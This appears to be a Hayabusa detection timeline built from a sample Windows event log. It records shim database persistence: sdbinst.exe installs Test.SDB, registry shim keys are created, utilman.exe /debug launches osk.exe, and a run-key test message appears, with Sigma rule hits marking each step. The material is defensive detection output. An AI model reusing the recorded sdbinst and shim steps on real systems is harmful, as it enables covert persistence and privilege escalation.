2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1600 | PGUID: 365ABB72-53C0-5C91-0000-001044FC0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1904 | PGUID: 365ABB72-53DE-5C91-0000-00105C050200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1980 | PGUID: 365ABB72-53DE-5C91-0000-00104D160200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2040 | PGUID: 365ABB72-53DF-5C91-0000-0010452D0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2464 | PGUID: 365ABB72-53F2-5C91-0000-001081FE0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2640 | PGUID: 365ABB72-5418-5C91-0000-001089390300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2684 | PGUID: 365ABB72-5418-5C91-0000-0010BF400300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2692 | PGUID: 365ABB72-5418-5C91-0000-001076420300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2756 | PGUID: 365ABB72-5418-5C91-0000-0010784B0300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 2948 | PGUID: 365ABB72-543D-5C91-0000-00102FA20300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:37.432 
+09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2960 | PGUID: 365ABB72-543D-5C91-0000-001099A30300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x33435 | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3068 | PGUID: 365ABB72-543E-5C91-0000-001009C90300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3080 | PGUID: 365ABB72-543E-5C91-0000-001096D00300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x33435 | 
PID: 3144 | PGUID: 365ABB72-543E-5C91-0000-001071E70300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3628 | PGUID: 365ABB72-546C-5C91-0000-00106A730400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2336 | PGUID: 365ABB72-550C-5C91-0000-001063E60400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | Process: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 2704 | PGUID: 365ABB72-551C-5C91-0000-001030590500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:46:25.856 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 
365ABB72-5290-5C91-0000-0010E6D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:47:56.436 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\cmd.exe | Process: C:\Windows\Explorer.EXE | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{4f02f780-dd6c-40e3-ab21-c1336815b4db}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default 
Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.459 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.509 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.559 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3724 | PGUID: 
365ABB72-55A1-5C91-0000-0010F48F0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3612 | PGUID: 365ABB72-55A1-5C91-0000-00102D930700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2368 | PGUID: 365ABB72-55A1-5C91-0000-0010D6960700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via 
sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.930 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3004 | PGUID: 365ABB72-55A4-5C91-0000-00103DA60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 
2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.807 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{d2c22380-b7b0-4d3a-b36e-bb0e804c265c}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.807 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.807 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim 
DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.867 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.978 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3908 | PGUID: 365ABB72-55D7-5C91-0000-0010DDC30700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | 
LID: 0x33435 | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3648 | PGUID: 365ABB72-55D8-5C91-0000-001060C90700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:28.168 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4024 | PGUID: 365ABB72-55DB-5C91-0000-001094D60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: 
""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.802 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{bebe1bf6-4a2e-46ad-9266-3fbf73d269a4}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.802 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.802 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim 
DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.832 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.972 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2668 | PGUID: 